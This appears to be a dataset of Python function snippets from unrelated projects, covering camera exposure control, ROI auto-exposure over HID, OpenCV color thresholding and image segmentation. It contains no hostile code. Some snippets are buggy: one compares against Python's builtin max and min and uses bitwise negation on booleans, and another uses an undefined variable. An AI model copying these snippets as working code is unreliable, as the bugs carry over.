CAMERA_CONTROL_CU20\n and output_buffer[1] == SET_AE_ROI_MODE_CU20\n and output_buffer[6] == SUCCESS\n ):\n print(\"\\nAutoExposure(RoI based) is enabled\\n\")\n return True", "def enable_roi_auto_exposure(xcord, ycord, image_width, image_height, hid_handle, win_size=4):\n outputLow = 0\n outputHigh = 255\n\n # Convert RoI center position to 0-255 value\n inputXLow = 0\n inputXHigh = image_width - 1\n inputXCord = xcord\n outputXCord = int(((inputXCord - inputXLow) / (inputXHigh - inputXLow)) * (outputHigh - outputLow) + outputLow)\n\n inputYLow = 0\n inputYHigh = image_height - 1\n inputYCord = ycord\n outputYCord = int(((inputYCord - inputYLow) / (inputYHigh - inputYLow)) * (outputHigh - outputLow) + outputLow)\n\n input_buffer = bytearray([0] * BUFFER_LENGTH)\n input_buffer[1] = CAMERA_CONTROL_CU20\n input_buffer[2] = SET_AE_ROI_MODE_CU20\n input_buffer[3] = AutoExpManual\n input_buffer[4] = outputXCord\n input_buffer[5] = outputYCord\n input_buffer[6] = win_size\n\n hid_write(hid_handle, input_buffer)\n output_buffer = hid_read(hid_handle)\n\n if output_buffer[6] == 0x00:\n print(\"\\nEnabling AutoExposure(RoI based) is failed\\n\")\n return False\n elif (\n output_buffer[0] == CAMERA_CONTROL_CU20\n and output_buffer[1] == SET_AE_ROI_MODE_CU20\n and output_buffer[6] == SUCCESS\n ):\n print(\"\\nAutoExposure(RoI based) is enabled\\n\")\n return True", "def reset_camera_clipping_range(self):\n self.ResetCameraClippingRange()", "def exposureCallback(self, config):\n rospy.loginfo('Set exposure: {}'.format(config['exposure']))", "def autoExpose(camera,\r\n target_level=245,\r\n adjust_shutter=True,\r\n adjust_gain=True):\r\n\r\n if target_level <= 0 or target_level >= 255:\r\n raise ValueError(\"Target level must be value between in the range\"\r\n \"]0,255[ !\")\r\n\r\n # There must be something to adjust\r\n if ~adjust_shutter and ~adjust_gain:\r\n raise ValueError(\"At one of the variables must be adjustable!\")\r\n\r\n while True:\r\n # Grab frame\r\n image = camera.retrieveBuffer()\r\n image = image.convert(PyCapture2.PIXEL_FORMAT.RAW8)\r\n data = image.getData()\r\n\r\n # Grab current camera properties\r\n shutter = 
camera.getProperty(PyCapture2.PROPERTY_TYPE.SHUTTER).absValue\r\n gain = camera.getProperty(PyCapture2.PROPERTY_TYPE.GAIN).absValue\r\n\r\n # Exposition adjustment\r\n max_val = np.max(data)\r\n print(\"Shutter = {0:.2f}[ms], Gain = {1:.1f}[db],\"\r\n \"Max pixel value = {2:d} \".format(shutter, gain, max_val),\r\n end='\\r')\r\n\r\n if max_val == max:\r\n if gain == 0 or ~adjust_shutter:\r\n if shutter > 0.1:\r\n shutter = max(0.1, shutter * (1 + _dShutter))\r\n else:\r\n gain = max(0, gain - _dGain)\r\n\r\n elif max_val < min:\r\n if shutter < 8:\r\n shutter = min(8.1, shutter / (1 + _dShutter))\r\n else:\r\n gain += _dGain\r\n else:\r\n break\r\n\r\n # Update camera parameters\r\n if autoExpose:\r\n camera.setProperty(type=PyCapture2.PROPERTY_TYPE.SHUTTER,\r\n autoManualMode=False, absValue=shutter)\r\n camera.setProperty(type=PyCapture2.PROPERTY_TYPE.GAIN,\r\n autoManualMode=False, absValue=gain)", "def expose(self):\n\n ## Determine type of exposure (exp, series, stack)\n exptype = str(self.exptypeComboBox.currentText())\n mode = self.modedict[exptype]\n\n ## Get exposure parameters\n if mode == \"bias\":\n exptime = 0.0\n else:\n exptime = self.exptimeSpinBox.value()\n imcount = self.imstackSpinBox.value()\n seqnum = self.imnumSpinBox.value()\n mintime = self.minexpSpinBox.value()\n maxtime = self.maxexpSpinBox.value()\n step = self.tstepSpinBox.value()\n\n ## Determine filter kwargs\n if self.filterToggleButton.isChecked():\n kwargs = {'filter_name' : str(self.filterComboBox.currentText())}\n else:\n kwargs = {'monowl' : self.monoSpinBox.value()}\n\n if self.testimCheckBox.isChecked():\n title = 'test'\n else:\n title = str(self.imtitleLineEdit.text())\n\n ## Build filepath\n filepath = os.path.join(str(self.imfilenameLineEdit.text()),title)\n \n ## Check if single exposure\n if exptype in [\"Exposure\", \"Dark\", \"Bias\"]:\n\n ## Perform exposure\n self.logger.info(\"Starting {0}s {1} image.\".format(exptime, exptype))\n self.image_start.emit(1)\n\n try:\n filename = exposure.im_acq(mode, filepath, exptime, seqnum, **kwargs)\n self.image_taken.emit(1)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken\".format(mode))\n except IOError:\n self.logger.exception(\"File already exits. Image not taken.\")\n else:\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.seqnum_inc.emit(seqnum)\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename,\n '-zoom', 'to', 'fit', '-cmap', 'b'])\n\n ## Check if a stack of exposures of same type\n elif exptype in [\"Exposure Stack\", \"Dark Stack\", \"Bias Stack\"]:\n\n total = seqnum + imcount\n self.logger.info(\"Starting {0}s {1} stack.\".format(exptime, exptype))\n self.image_start.emit(imcount)\n\n try:\n for i in range(seqnum, total):\n self.logger.info(\"Starting image {0} of {1}.\".format(i+1-seqnum, imcount))\n filename = exposure.im_acq(mode, filepath, exptime, i, **kwargs)\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.image_taken.emit(i+1-seqnum)\n self.seqnum_inc.emit(i)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken.\".format(mode))\n except IOError:\n self.logger.exception(\"File already exists. 
Image not taken.\")\n else:\n self.logger.info(\"Exposure stack finished successfully.\")\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename, '-zoom', 'to', 'fit', '-cmap', 'b'])\n \n ## Check if a series of exposures of increase exposure time\n elif exptype in [\"Exposure Series\", \"Dark Series\"]:\n\n ## Parameter checks\n if mintime > maxtime:\n self.logger.warning(\"Minimum time must be less than Maximum time. Series not started.\")\n return\n elif step <= 0:\n self.logger.warning(\"Time step must be greater than 0. Series not started.\")\n return\n\n ## Construct array of exposure times\n t = mintime\n time_array = []\n while t <= maxtime:\n time_array.append(t)\n t += step\n \n ## Perform series\n self.logger.info(\"Starting {0} series with mintime {1}, maxtime {2}, and step {3}.\".format(exptype, mintime, maxtime, step))\n self.image_start.emit(len(time_array))\n \n try:\n for i, time in enumerate(time_array):\n self.logger.info(\"Starting {0}s {1} image.\".format(time, mode))\n filename = exposure.im_acq(mode, filepath, time, seqnum, **kwargs)\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.image_taken.emit(i+1)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken.\".format(mode))\n except IOError:\n self.logger.exception(\"File already exists. Image not taken.\")\n else:\n self.logger.info(\"Exposure series finished successfully.\")\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename, '-zoom', 'to', 'fit', '-cmap', 'b'])\n self.seqnum_inc.emit(seqnum)", "def constrain_roi(self, frame):\n raise NotImplementedError", "def endexposureloop(self):\n self.max_exposures = self.current_exposure", "def adjust(self, image):\n ...", "def segment_and_find_positions(self):\n initial_image = self.data\n xdim = self.data.shape[0]\n\n ydim = self.data.shape[1]\n downsized_image = transform.resize(\n initial_image,\n (xdim / DOWNSCALING_FACTOR, ydim / DOWNSCALING_FACTOR),\n mode=\"constant\",\n )\n rescaled_image = exposure.rescale_intensity(downsized_image)\n print(\"Starting Canny filtering\")\n g_edges = skimage.feature.canny(\n rescaled_image,\n sigma=self.canny_sigma,\n low_threshold=self.canny_low_threshold,\n )\n print(\"Starting dilation\")\n dilation = morphology.dilation(g_edges, morphology.disk(3))\n print(\"Starting erosion\")\n eroded = morphology.erosion(dilation, morphology.disk(4))\n dilation = morphology.dilation(\n eroded, morphology.diamond(4)\n ) # Dont change to disk\n print(\"Starting to remove small holes\")\n filled = morphology.remove_small_holes(\n dilation, area_threshold=self.remove_small_holes_area_threshold\n )\n print(\"Starting erosion\")\n eroded = morphology.erosion(filled, morphology.diamond(3))\n print(\"Applying filters\")\n filtered_image = eroded\n if self.colony_filters_dict is not None:\n for filter_name in self.colony_filters_dict.keys():\n filtered_image = segmentation_filters.apply_filter(\n filter_name, filtered_image, self.colony_filters_dict[filter_name]\n )\n\n colony_edges = morphology.dilation(feature.canny(filtered_image, 0.01))\n print(\"Starting outlining\")\n outline = downsized_image.copy()\n outline[colony_edges] = 65535\n distance = ndimage.distance_transform_edt(filtered_image)\n smoothed_well = ndimage.gaussian_filter(downsized_image, 0.35)\n outline.copy()\n objs, num_objs = ndimage.label(filtered_image)\n print(\"Applying 
filters for points\")\n if self.mode == \"A\":\n # point selection: Smoothest point in the center region\n for obj in range(1, num_objs + 1):\n print(\"On object {} of {}\".format(obj, num_objs))\n mask = objs == obj\n dist_mask = distance * mask\n # for each colony,\n # find the maximum distance from the two fold distance map.\n # The edge is at 0% and the center of the colony is at 100%\n d_max = dist_mask.max()\n # Getting the points which is at least 40% away from the edge\n top_percent = dist_mask > (d_max * 0.40)\n colony_mask = smoothed_well * top_percent\n colony_edges = feature.canny(colony_mask, 0.1)\n # applying the second distance transform\n # to find the smoothest point in the correct region\n inner_edges = ndimage.distance_transform_edt(\n ~colony_edges * top_percent\n )\n smooth_point = numpy.where(inner_edges == inner_edges.max())\n smooth_point = (smooth_point[0][0], smooth_point[1][0])\n smooth_point_corrected = (\n smooth_point[0] * DOWNSCALING_FACTOR,\n smooth_point[1] * DOWNSCALING_FACTOR,\n )\n self._point_locations.append(smooth_point_corrected)\n elif self.mode == \"C\":\n for obj in range(1, num_objs + 1):\n print(\"On object {} of {}\".format(obj, num_objs))\n mask = objs == obj\n dist_mask = distance * mask\n # point selection: edge, ridge & center respectively\n self.get_mode_c_points(dist_mask, 0, 0.03)\n self.get_mode_c_points(dist_mask, 0.15, 0.20)\n self.get_mode_c_points(dist_mask, 0.90, 0.99)", "def filter_mentor_advise(image):\n HSV = cv2.cvtColor(image, cv2.COLOR_RGB2HSV)\n\n # For yellow\n yellow = cv2.inRange(HSV, (20, 100, 100), (50, 255, 255))\n\n # For white\n sensitivity_1 = 68\n white = cv2.inRange(HSV, (0,0,255-sensitivity_1), (255,20,255))\n\n sensitivity_2 = 60\n HSL = cv2.cvtColor(image, cv2.COLOR_RGB2HLS)\n white_2 = cv2.inRange(HSL, (0,255-sensitivity_2,0), (255,255,sensitivity_2))\n white_3 = cv2.inRange(image, (200,200,200), (255,255,255))\n\n bit_layer = yellow | white | white_2 | white_3\n\n return bit_layer", "def mouseRange(event, x, y, flags, param):\n \n #If the left button was clicked\n if event==cv.CV_EVENT_LBUTTONDOWN:\n print \"x, y are\", x, y\n pixel_val= D.image[y,x]\n print \"the pixel's depth value is\", pixel_val\n if D.mode == \"setLeft\":\n D.dot1 = (x,y)\n D.mode = D.lastmode\n elif D.mode == \"setRight\":\n D.dot2 = (x,y)\n D.mode = D.lastmode\n elif D.mode == \"setTop\":\n D.dot3 = (x,y)\n D.mode = D.lastmode\n elif D.mode == \"setDown\":\n D.dot4 = (x,y)\n D.mode = D.lastmode", "def setup_hsv_boundaries():\n global l_hsv_thresh, u_hsv_thresh\n cv2.destroyAllWindows()\n l_hsv_thresh, u_hsv_thresh = prompt_calibration()\n cv2.destroyAllWindows()", "def find_components_old(image,deltaPix,lens_rad_arcsec = 5.0,lens_rad_ratio = None, gal_rad_ratio = 0.1,min_size_arcsec=0.3,thresh=0.4, show_locations=False):\n\n # convert minimum component size in pixel units\n min_size = int(min_size_arcsec / deltaPix)\n \n #Convert lens radius and central galaxy radius to pixels\n if lens_rad_ratio == None:\n lens_rad = int(lens_rad_arcsec / deltaPix)\n else: lens_rad = int(len(image) * lens_rad_ratio)\n gal_rad = int(len(image) * gal_rad_ratio)\n \n # downscale source image to data resolution (for speed + easier for converting to data units)\n #down = image_util.re_size(image, factor=supersampling_factor_source)\n \n # apply laplacian of gaussian (LoG) filter to enhance maxima\n filtered = - gaussian_laplace(deepcopy(image), sigma = min_size, mode='constant', cval=0.)\n \n# print(filtered.min(),filtered.max(),filtered.min() + thresh * 
np.abs(filtered.min()))\n \n \n # assume all value below max*threshold can not be maxima, so put all to zero\n# filtered[filtered < thresh*filtered.max()] = 0.\n \n# assume all value below min*threshold can not be maxima, so put all to zero\n filtered[filtered < filtered.min() + thresh * np.abs(filtered.min())] = 0.\n \n if show_locations:\n plt.figure(figsize = (8,8))\n plt.subplot(1,2,1)\n plt.imshow(image, origin='lower', norm=SymLogNorm(5))\n plt.title('Image')\n\n plt.subplot(1,2,2)\n plt.imshow(filtered, origin='lower', norm=SymLogNorm(5))\n plt.title('Filtered Image')\n plt.show()\n \n # find coordinates of local maxima\n #print(int(0.5 * min_size))\n max_idx_2d_small = peak_local_max(filtered, min_distance=0)\n max_idx_2d_large = peak_local_max(filtered, min_distance=1)\n \n x_list_small, y_list_small = max_idx_2d_small[:, 1], max_idx_2d_small[:, 0]\n x_list_large, y_list_large = max_idx_2d_large[:, 1], max_idx_2d_large[:, 0]\n \n im_center_x, im_center_y = len(image) / 2., len(image) / 2.\n \n R = np.sqrt((x_list_large - im_center_x)**2 + (y_list_large - im_center_y)**2)\n new_center_x, new_center_y = x_list_large[R < gal_rad], y_list_large[R < gal_rad]\n \n if (len(new_center_x) > 1) and (len(x_list_large[R == R.min()]) ==1 ): \n new_center_x, new_center_y = x_list_large[R == R.min()], y_list_large[R == R.min()]\n elif (len(new_center_x) > 1) and (len(x_list_large[R == R.min()]) > 1 ): \n new_center_x, new_center_y = im_center_x, im_center_y\n elif len(new_center_x) == 0: \n new_center_x, new_center_y = im_center_x, im_center_y\n \n \n R_small = np.sqrt((x_list_small - new_center_x)**2 + (y_list_small - new_center_y)**2)\n R_large = np.sqrt((x_list_large - new_center_x)**2 + (y_list_large - new_center_y)**2)\n \n x_sats, y_sats = x_list_small[R_small > lens_rad], y_list_small[R_small > lens_rad]\n \n # show maxima on image for debug\n if show_locations:\n fig = plt.figure(figsize=(4, 4))\n #plt.imshow(image, origin='lower', cmap=cmap_flux, norm=LogNorm(1e-2))\n plt.imshow(image, origin='lower', norm=SymLogNorm(5))\n \n for i in range(len(x_sats)):\n plt.scatter([x_sats[i]], [y_sats[i]], c='red', s=60, marker='+')\n# plt.annotate(i+1, (x_list[i], y_list[i]), color='black')\n \n# for i in range(len(x_mask)):\n# plt.scatter([x_mask[i]], [y_mask[i]], c='red', s=100, marker='*')\n# plt.annotate(i+1, (x_mask[i], y_mask[i]), color='red')\n plt.scatter(new_center_x, new_center_y,c='red', s=100, marker='*')\n \n draw_lens_circle = Circle((new_center_x, new_center_y),lens_rad ,fill=False)\n draw_gal_circle = Circle((new_center_x, new_center_y),gal_rad, fill = False)\n plt.gcf().gca().add_artist(draw_lens_circle)\n plt.gcf().gca().add_artist(draw_gal_circle)\n plt.title('Detected Components')\n plt.text(1, 1, \"detected components\", color='red')\n fig.axes[0].get_xaxis().set_visible(True); fig.axes[0].get_yaxis().set_visible(True)\n plt.show()\n return (x_sats, y_sats), (new_center_x, new_center_y)", "def clip(self, image, x=0, y=0, w=0, h=0, oX=0, oY=0):\n if(w==0):\n w = image.get_rect()[2]\n if(h==0):\n h = image.get_rect()[3]\n needleW = w + 2*math.sqrt(oX*oX)\n needleH = h + 2*math.sqrt(oY*oY)\n imageOut = pygame.Surface((needleW, needleH))\n imageOut.fill((255,255,0))\n imageOut.set_colorkey((255,255,0))\n imageOut.blit(image, (needleW/2-w/2+oX, needleH/2-h/2+oY), pygame.Rect(x,y,w,h))\n return imageOut", "def ring_ext(self, tissue):\n print(\"controller - ring_ext!\")\n img_cv2_mask = self.pressure_img.mask\n self.pressure_img.roi_crop(img_cv2_mask, tissue, 1)", "def 
configure_exposure(cam,exposure):\n\n #print(\"*** CONFIGURING EXPOSURE ***\\n\")\n\n try:\n result = True\n\n # Turn off automatic exposure mode\n #\n # *** NOTES ***\n # Automatic exposure prevents the manual configuration of exposure\n # times and needs to be turned off for this example. Enumerations\n # representing entry nodes have been added to QuickSpin. This allows\n # for the much easier setting of enumeration nodes to new values.\n #\n # The naming convention of QuickSpin enums is the name of the\n # enumeration node followed by an underscore and the symbolic of\n # the entry node. Selecting \"Off\" on the \"ExposureAuto\" node is\n # thus named \"ExposureAuto_Off\".\n #\n # *** LATER ***\n # Exposure time can be set automatically or manually as needed. This\n # example turns automatic exposure off to set it manually and back\n # on to return the camera to its default state.\n\n \n\n # Set exposure time manually; exposure time recorded in microseconds\n #\n # *** NOTES ***\n # Notice that the node is checked for availability and writability\n # prior to the setting of the node. In QuickSpin, availability and\n # writability are ensured by checking the access mode.\n #\n # Further, it is ensured that the desired exposure time does not exceed\n # the maximum. Exposure time is counted in microseconds - this can be\n # found out either by retrieving the unit with the GetUnit() method or\n # by checking SpinView.\n\n if cam.ExposureTime.GetAccessMode() != PySpin.RW:\n print(\"Unable to set exposure time. Aborting...\")\n return False\n\n # Ensure desired exposure time does not exceed the maximum\n exposure_time_to_set = exposure\n exposure_time_to_set = min(cam.ExposureTime.GetMax(), exposure_time_to_set)\n cam.ExposureTime.SetValue(exposure_time_to_set)\n\n except PySpin.SpinnakerException as ex:\n print(\"Error: %s\" % ex)\n result = False\n\n return result", "def changeExposure(cam=0, increment=None, value=None):\n try:\n if increment is not None:\n exposure = commands.getoutput(\"v4l2-ctl -d {} --get-ctrl exposure_absolute\".format(cam)).split()[1]\n exposure = int(exposure)\n exposure = max(0, exposure + increment)\n elif value is not None:\n exposure = max(0, value)\n else:\n raise Exception(\"increment or value must be an integer\")\n commands.getoutput(\"v4l2-ctl -d {} --set-ctrl exposure_absolute={}\".format(cam, exposure))\n print \"Exposure {}\".format(exposure)\n except Exception as e:\n print \"Failed to change exposure: {}\".format(e)", "def calibrate(cap, location):\n\n #Poisition and size of sensor\n [x, y, h, w] = location\n\n #show square to user and wait for key\n print(\"please, step away to clear the blue square displayed on screen and press q to continue\")\n while True:\n ret, frame = cap.read()\n cv2.namedWindow('Calibrate',cv2.WINDOW_NORMAL)\n show = cv2.rectangle(frame, (x,y), (x+w,y+h), (255, 0, 0) , 5)\n cv2.imshow('Calibrate', show)\n key = cv2.waitKey(1)\n if key == ord('q'):\n break\n\n #get first image, process and define window previous for iteration\n ret, frame = cap.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame = cv2.GaussianBlur(frame, (7,7), 0)\n previous = frame[y:y+w,x:x+h]\n\n #set parameters for mean value of sensor, kernel of erode function,\n sampleNbMean = 50\n xi = np.empty((0, sampleNbMean))\n kernel = np.ones((5,5), np.uint8)\n\n #iterate over each frame until sample number\n for iteration in range(sampleNbMean):\n\n # Capture frame, draw the window and display to the user\n ret, frame = cap.read()\n # Image 
operation\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame = cv2.GaussianBlur(frame, (7,7), 0)\n\n #get present window\n present = frame[y:y+w,x:x+h]\n\n #add sample for mean, add diference of window with prieviuos\n xi = np.append(xi,\n np.sum(\n cv2.erode(\n cv2.bitwise_xor(present,previous), kernel, iterations=1)))\n\n #present image becomes previous before steping into next image\n previous = present\n\n #mean\n mean = np.sum(xi)/len(xi)\n\n #sigma\n sum = 0\n for sample in xi:\n sum += np.power(sample - mean, 2)\n sigma = np.sqrt(sum/len(xi))\n\n #close window\n cv2.destroyWindow('Calibrate')\n\n return mean, sigma", "def change_zoom(self, b):\n\n x_mid = int(self.ff[0].info['xres'] / 2)\n y_mid = int(self.ff[0].info['yres'] / 2)\n\n x = x_mid - self.x_crop_slider.value\n\n if self.y_crop.value is True:\n y = y_mid - self.y_crop_slider.value\n else:\n y = y_mid - self.x_crop_slider.value\n\n x0 = x_mid - x\n x1 = x_mid + x\n y0 = y_mid - y\n y1 = y_mid + y\n\n self.x_range = [x0, x1]\n self.y_range = [y0, y1]\n\n self.ax.set_xlim([x0, x1])\n self.ax.set_ylim([y0, y1])", "def adjust_thresholding(self, pos_frame, which='animal'):\n\n cv2.namedWindow('Adjust Thresholding')\n if which == 'animal':\n cv2.createTrackbar('H_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_animal\"][0],\n 255,\n self.nothing)\n cv2.createTrackbar('H_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_animal\"][0],\n 255,\n self.nothing)\n cv2.createTrackbar('S_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_animal\"][1],\n 255,\n self.nothing)\n cv2.createTrackbar('S_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_animal\"][1],\n 255,\n self.nothing)\n cv2.createTrackbar('V_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_animal\"][2],\n 255,\n self.nothing)\n cv2.createTrackbar('V_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_animal\"][2],\n 255,\n self.nothing)\n elif which == 'material':\n cv2.createTrackbar('H_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_material\"][0],\n 255,\n self.nothing)\n cv2.createTrackbar('H_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_material\"][0],\n 255,\n self.nothing)\n cv2.createTrackbar('S_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_material\"][1],\n 255,\n self.nothing)\n cv2.createTrackbar('S_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_material\"][1],\n 255,\n self.nothing)\n cv2.createTrackbar('V_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_material\"][2],\n 255,\n self.nothing)\n cv2.createTrackbar('V_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_material\"][2],\n 255,\n self.nothing)\n else:\n utils.print_color_message(\"[INFO] Select 'animal' or 'material' to preview the default thresholding values\",\n \"darkgreen\")\n cv2.createTrackbar('H_Low', 'Adjust Thresholding', 0, 255, self.nothing)\n cv2.createTrackbar('H_High', 'Adjust Thresholding', 255, 255, self.nothing)\n cv2.createTrackbar('S_Low', 'Adjust Thresholding', 0, 255, self.nothing)\n cv2.createTrackbar('S_High', 'Adjust Thresholding', 255, 255, self.nothing)\n cv2.createTrackbar('V_Low', 'Adjust Thresholding', 0, 255, self.nothing)\n cv2.createTrackbar('V_High', 'Adjust Thresholding', 255, 255, 
self.nothing)\n\n test_frame = self._color_capture.get_frame(pos_frame)\n test_frame_cropped = test_frame[self.up_left_y:self.low_right_y, self.up_left_x:self.low_right_x]\n test_frame_cropped_hsv = cv2.cvtColor(test_frame_cropped, cv2.COLOR_BGR2HSV)\n test_frame_blurred = cv2.blur(test_frame_cropped_hsv, (5, 5))\n\n while True:\n h_l = cv2.getTrackbarPos('H_Low', 'Adjust Thresholding')\n h_h = cv2.getTrackbarPos('H_High', 'Adjust Thresholding')\n s_l = cv2.getTrackbarPos('S_Low', 'Adjust Thresholding')\n s_h = cv2.getTrackbarPos('S_High', 'Adjust Thresholding')\n v_l = cv2.getTrackbarPos('V_Low', 'Adjust Thresholding')\n v_h = cv2.getTrackbarPos('V_High', 'Adjust Thresholding')\n test_mask_mouse = cv2.inRange(test_frame_blurred, (h_l, s_l, v_l), (h_h, s_h, v_h))\n overlay = cv2.bitwise_and(test_frame_cropped_hsv, test_frame_cropped_hsv, mask=test_mask_mouse)\n cv2.imshow('Adjust Thresholding', overlay)\n key = cv2.waitKey(10) & 0xFF\n if key == ord(\"q\"):\n break\n cv2.destroyAllWindows()\n for i in range(1, 5):\n cv2.waitKey(1)", "def trackObject(img, lower, upper):\n\thsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\tlower_col = np.array(lower)\n\tupper_col = np.array(upper)\n\tmask = cv2.inRange(hsv, lower_col, upper_col)\n\tres = cv2.bitwise_and(img, img, mask=mask)\n\treturn res", "def process_frame(self, downsize):\n # if (not hasattr(downsize,'shape')) and (not hasattr(downsize,'len')):\n # downsize = np.array(downsize)\n\n if type(downsize) != np.ndarray:\n raise TypeError\n\n if not downsize.any():\n raise ValueError\n\n if self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.frame_history.append(downsize)\n\n # Remove no longer needed frames from memory\n self.frame_history = self.frame_history[-(self.LMC_rec_depth):]\n downsize = signal.lfilter(self.b, self.a, self.frame_history, axis=0)[-1]\n\n # Center surround antagonism kernel applied.\n\n downsize = cv2.filter2D(downsize, -1, self.CSKernel)\n\n # RTC filter.\n u_pos = deepcopy(downsize)\n u_neg = deepcopy(downsize)\n u_pos[u_pos < 0] = 0\n u_neg[u_neg > 0] = 0\n u_neg = -u_neg\n\n # On first step, instead of computing just save the images.\n if self.t == self.T0:\n self.v_pos_prev = deepcopy(u_pos)\n self.v_neg_prev = deepcopy(u_neg)\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Do everything for pos == ON.\n tau_pos = u_pos - self.u_pos_prev\n tau_pos[tau_pos >= 0] = 0.001\n tau_pos[tau_pos < 0] = 0.1\n mult_pos = self.rtc_exp(self.dt, tau_pos)\n v_pos = -(mult_pos - 1) * u_pos + mult_pos * self.v_pos_prev\n self.v_pos_prev = deepcopy(v_pos)\n\n # Do everything for neg == OFF.\n tau_neg = u_neg - self.u_neg_prev\n tau_neg[tau_neg >= 0] = 0.001\n tau_neg[tau_neg < 0] = 0.1\n mult_neg = self.rtc_exp(self.dt, tau_neg)\n v_neg = -(mult_neg - 1) * u_neg + mult_neg * self.v_neg_prev\n self.v_neg_prev = deepcopy(v_neg)\n\n # keep track of previous u.\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Subtract v from u to give the output of each channel.\n out_pos = u_pos - v_pos\n out_neg = u_neg - v_neg\n\n # Now apply yet another filter to both parts.\n out_pos = cv2.filter2D(out_pos, -1, self.H_filter)\n out_neg = cv2.filter2D(out_neg, -1, self.H_filter)\n out_pos[out_pos < 0] = 0\n out_neg[out_neg < 0] = 0\n\n if self.t == self.T0:\n self.out_neg_prev = deepcopy(out_neg)\n\n # Delay off channel.\n out_neg = signal.lfilter(self.b1, self.a1, [self.out_neg_prev, out_neg], axis=0)[-1]\n self.out_neg_prev = 
out_neg\n downsize = out_neg * out_pos\n\n # Show image.\n downsize *= self.gain\n downsize = np.tanh(downsize)\n\n # Threshold.\n downsize[downsize < self.threshold] = 0\n\n if not self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.t += self.dt\n\n return downsize", "def _get_closeup(self, idx):\n img_arr = p.getCameraImage(width=self._width,\n height=self._height,\n viewMatrix=self._view_matrix,\n projectionMatrix=self._proj_matrix)\n rgb = img_arr[2]\n depth = img_arr[3]\n min = 0.97\n max=1.0\n segmentation = img_arr[4]\n depth = np.reshape(depth, (self._height, self._width,1) )\n segmentation = np.reshape(segmentation, (self._height, self._width,1) )\n\n np_img_arr = np.reshape(rgb, (self._height, self._width, 4))\n np_img_arr = np_img_arr[:, :, :3].astype(np.float64)\n\n view_mat = np.asarray(self._view_matrix).reshape(4, 4)\n proj_mat = np.asarray(self._proj_matrix).reshape(4, 4)\n # pos = np.reshape(np.asarray(list(p.getBasePositionAndOrientation(self._objectUids[0])[0])+[1]), (4, 1))\n\n AABBs = np.zeros((len(self._objectUids), 2, 3))\n cls_ls = []\n \n for i, (_uid, _cls) in enumerate(zip(self._objectUids, self._objectClasses)):\n AABBs[i] = np.asarray(p.getAABB(_uid)).reshape(2, 3)\n cls_ls.append(NAME2IDX[_cls])\n\n # np.save('/home/tony/Desktop/obj_save/view_mat_'+str(self.img_save_cnt), view_mat)\n # np.save('/home/tony/Desktop/obj_save/proj_mat_'+str(self.img_save_cnt), proj_mat)\n # np.save('/home/tony/Desktop/obj_save/img_'+str(self.img_save_cnt), np_img_arr.astype(np.int16))\n # np.save('/home/tony/Desktop/obj_save/AABB_'+str(self.img_save_cnt), AABBs)\n # np.save('/home/tony/Desktop/obj_save/class_'+str(self.img_save_cnt), np.array(cls_ls))\n\n np.save(OUTPUT_DIR + '/closeup_' + str(self.img_save_cnt - 1) + '_' + str(idx), np_img_arr.astype(np.int16))\n dets = np.zeros((AABBs.shape[0], 5))\n for i in range(AABBs.shape[0]):\n dets[i, :4] = self.get_2d_bbox(AABBs[i], view_mat, proj_mat, IM_HEIGHT, IM_WIDTH)\n dets[i, 4] = int(cls_ls[i])\n # np.save(OUTPUT_DIR + '/annotation_'+str(self.img_save_cnt), dets)\n\n test = np.concatenate([np_img_arr[:, :, 0:2], segmentation], axis=-1)\n\n return test", "def testMatchSwarpBilinearExposure(self):\n self.compareToSwarp(\"bilinear\", useWarpExposure=True,\n useSubregion=False, useDeepCopy=True)", "def adjust_brightness(image, delta):\r\n return _clip(image + delta * 255)", "def apply(self, image):\n\n bgr = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n\n # Convert to float image\n float_im = bgr.copy().astype('float32') / 255\n blurred = cv2.GaussianBlur(float_im, ksize=(9, 9), sigmaX=1, sigmaY=9)\n cplanes = colors.bgr2cpaces(blurred)\n lanes, py, pw = finder.find_lane_pixels(cplanes, self.pfilter, gamma=0.4)\n\n binary = lanes\n\n # Find lanes and fit curves\n if not self.curve:\n self.sw.find(binary)\n self.curve= CurveSearch(self.sw.left_fit, 